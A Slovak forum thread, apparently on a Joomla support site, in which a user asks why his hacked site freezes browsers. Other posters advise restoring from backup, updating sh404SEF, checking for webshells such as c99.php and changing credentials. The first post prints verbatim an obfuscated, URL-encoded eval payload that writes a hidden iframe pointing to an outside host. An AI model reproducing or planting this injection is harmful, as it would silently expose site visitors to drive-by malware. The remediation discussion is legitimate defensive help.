ďalšie »

[melichar]

rano si chcem spustit stranku melon.sk robim ju pre nasu firmu ale v podstate z vlastnej iniciativy ... a hen co mi pribudlo v index.php (sablona) a index.php (administracia) stranku natiahne ale potom mi zamrzne cely prehliadac ... nevie nahodou niekto ako k tomu doslo ? 

to nakonci vyzeralo takto

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%33%33%39%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%61%6c%6c%74%72%61%66%66%2e%72%75%2f%6c%6f%6c%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%31%33%36%39%29%2b%27%61%64%38%36%38%39%32%5c%27%20%77%69%64%74%68%3d%36%39%39%20%68%65%69%67%68%74%3d%33%33%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

a v podstate to je aj vo vsetkych indexoch.html hmmm doteraz to islo celkom vpoho ... akurat som skusal joomfish, ze este vyskusam nejaky formular tam dorobyt a narvem to obsahom a baac ... ale este pre explorer to treba nejako poriesit ...

Vdaka vopred za nejake odpovede

[melichar]

... akurat som skusal joomfish, docela sa mi to paci, potom este jeden formular tam potrebujem  nahodit a ze to narvem obsahom a baac dneska, nist nejde  ... ale este pre explorer to treba nejako poriesit ...

nejako takto to malo zniet

[melichar]

je to vsade de su prava 777 a 644 ... nahram znova vsetko a ake prava mam nastavovat ?
pouzivam rozsirenie lattermann na postu, ma s nim niekto skusenosti ? (je to nebezpecne rozsirenie)

[Tibor Tóth]

Podľa všetkého máš hacknutú stránku - riešili sme to tu už. Pozri sa na to v tomto podfóre.

[melichar]

Vdaka za utvrdenie, tak teraz nahram zalohu, nastavim vsetko na 644, prip. 444 ... (ale ako sa to tam dostalo ?) pouzivam na postu lettermanna (tam je chyba vraj odstranena) a sh404SEF (tam je XSS - Cross-site scripting chyba) to by malo byt vsetko nebezpecne co tam mam. Tie skripty pocitam boli ta chyba XSS a preto to tak dopadlo. Ma niekto skusenosti s lettermannom a sh404SEF  ... v podstate opravit to nie je problem, len ci to uz niekto robil a ma zaujem sem napisat svoj poznatok, by ma zaujimalo.

   

[admin]

Útok nemusel byť vedený priamo cez tvoju stránku,aj keď vzhľadom na chybu v sh404SEF je to pravdepodobné(pomohlo by preštudovať si HTTP logy,pokiaľ ich máš k dispozícii,poprípade požiadať o pomoc správcu serveru).K napadnutiu mohlo dôjsť aj cez bezpečnostnú chybu na serveri alebo v prípade zdielaného hostingu aj cez inú doménu(čo je ale tiež chyba nastavenia serveru).

-Pokiaľ máš zálohu,najlepšie je zmazať všetky súbory zo serveru a nakopírovať ich zo zálohy nanovo.Predtým si ale skontroluj,či sa v zálohe nenachádzajú škodlivé súbory (v závislosti od dátumu zálohy).Tieto súbory majú často názvy ako c99.php,r57.php, súbory s príponou .pl a pod. Taktiež antivírové programy (napr. NOD) dokážu zachytiť aj skodlivé programy v jazyku php poprípade pearl.
-Urýchlene aktualizuj sh404SEF
-Prečítaj si návod Ako zabezpečiť stránku.
-Skontroluj,či si útočník nevytvoril užívateľa s administrátorskými právami.
-Zmeň prístupové údaje pre MySQL.
-Zmeň svoje prístupové údaje do Joomla!